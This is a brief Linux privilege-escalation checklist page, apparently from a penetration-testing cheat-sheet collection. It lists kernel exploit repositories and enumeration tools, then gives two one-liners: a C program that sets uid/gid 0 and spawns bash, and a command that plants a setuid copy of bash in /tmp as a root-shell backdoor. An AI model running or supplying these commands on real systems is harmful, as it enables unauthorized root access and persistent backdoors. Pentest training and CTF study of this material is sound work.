.. / priv-esc_checklist_linux
Star

Privilege Escalation

It can help to gain a higher permission access level.

Resources

https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/mzet-/linux-exploit-suggester
https://github.com/lucyoa/kernel-exploits
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
#c-shell: echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > shell.c 
#script: cp /bin/bash /tmp/shell && chmod +s /tmp/shell && chmod o+x /tmp/shell